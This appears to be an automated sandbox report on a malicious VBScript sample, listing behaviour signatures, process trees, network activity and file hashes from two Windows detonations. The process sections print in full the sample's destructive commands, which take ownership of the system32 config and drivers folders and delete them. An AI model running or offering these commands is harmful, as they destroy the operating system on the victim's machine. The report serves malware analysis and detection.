Malware Analysis Report

2024-11-16 12:52

Sample ID 240815-1dy1xszfmm
Target file.vbs
SHA256 e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c

Threat Level: Likely malicious

The file file.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Enumerates physical storage devices

Modifies registry class

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:32

Reported

2024-08-15 21:35

Platform

win7-20240704-en

Max time kernel

119s

Max time network

120s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\Notepad.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2764 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2764 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2764 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2788 wrote to memory of 2628 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2628 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2628 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2680 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2680 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2788 wrote to memory of 2680 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2628 wrote to memory of 2796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2628 wrote to memory of 2796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2628 wrote to memory of 2796 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2680 wrote to memory of 1264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2680 wrote to memory of 1264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2680 wrote to memory of 1264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2628 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2628 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2628 wrote to memory of 1912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2680 wrote to memory of 2160 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2680 wrote to memory of 2160 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2680 wrote to memory of 2160 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\UnpublishReceive.vbs

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\SetPush.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\UnpublishReceive.vbs"

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 a5248e8a553244ebf5fe783d59068860
SHA1 f866fc5f1d41e8cf209b3ea253f49a9caebb0012
SHA256 e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c
SHA512 7f7fafcee64a9d9d5ca06e19e011f6e485e931b06a256bf924fa06e7ade8ac25458dc8980c6409c16a22f93602ea5e6e872754966bf67a92a7b3ab4b749465b8

C:\Users\Admin\Desktop\GetMove.vbs

MD5 ece02545122cc48c9d8afaf3f94dd04f
SHA1 8e07b6da685faad07f8413230a95ce0ae8987e0d
SHA256 5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
SHA512 e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:32

Reported

2024-08-15 21:35

Platform

win10v2004-20240802-en

Max time kernel

144s

Max time network

135s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4088,i,11708048364682646792,608099842549576907,262144 --variations-seed-version --mojo-platform-channel-handle=1020 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 edge.msiserver.lan udp
US 8.8.8.8:53 edge.msiserver.lan udp
US 8.8.8.8:53 edge.msiserver.lan udp
US 8.8.8.8:53 edge.msiserver.lan udp
US 8.8.8.8:53 edge.msiserver.lan udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 23.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 a5248e8a553244ebf5fe783d59068860
SHA1 f866fc5f1d41e8cf209b3ea253f49a9caebb0012
SHA256 e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c
SHA512 7f7fafcee64a9d9d5ca06e19e011f6e485e931b06a256bf924fa06e7ade8ac25458dc8980c6409c16a22f93602ea5e6e872754966bf67a92a7b3ab4b749465b8

C:\Users\Admin\Desktop\ConvertToSelect.vbs

MD5 ece02545122cc48c9d8afaf3f94dd04f
SHA1 8e07b6da685faad07f8413230a95ce0ae8987e0d
SHA256 5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
SHA512 e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5